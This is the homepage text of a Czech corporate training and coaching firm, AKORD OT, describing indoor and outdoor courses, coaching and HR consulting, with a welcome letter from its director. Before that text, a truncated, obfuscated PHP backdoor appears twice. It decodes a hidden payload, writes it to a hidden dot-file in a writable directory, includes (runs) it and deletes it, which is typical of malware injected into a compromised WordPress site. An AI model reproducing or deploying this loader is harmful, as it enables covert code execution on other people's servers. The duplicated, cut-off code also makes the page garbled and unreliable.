100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Úvodní stránka - AKORD OT

Indoor

Připravujeme tréninky na míru rozvojových potřeb našich klientů. Hledáte-li konkrétní kurz, navštivte náš katalog.

Outdoor

Nabízíme rozvojové outdoorové kurzy, teambuildingové
i teamspiritové programy. Vše s komplexním servisem.

Koučování

Spolupracujeme jak s firmami, tak i s individuálními účastníky
z řad veřejnosti. Setkáte se se zkušenými kouči a mentory.

Poradenství

Služby nabízíme jak HR oddělením, tak i týmům, například v oblasti facilitace strategických workshopů.

Vítejte

v péči AKORDu

Dámy a pánové,

Vladimír Svatoš, jednatelpřes dvacet let se pohybuji v oblasti firemního vzdělávání, z toho více než polovinu se značkou AKORDu. Vždy mi šlo především o výsledky pro klienty - o pozitivní změny v chování, ke kterým je moje kurzy či koučovací setkání dokáží nasměrovat, navíc způsobem, který je nestresující a partnerský. Stejné poslání - přinášet inspiraci ke změně a podporovat radost a uspokojení z navazujících úspěchů - jsem se snažil přenést na celý AKORD.

Rád bych Vás pozval ke spolupráci s AKORDem.  Pojďte se přesvědčit, že se to podařilo. Věřím, že oceníte naši poctivost i odbornou fundovanost.

Těším se na setkání s Vámi.

Vladimír Svatoš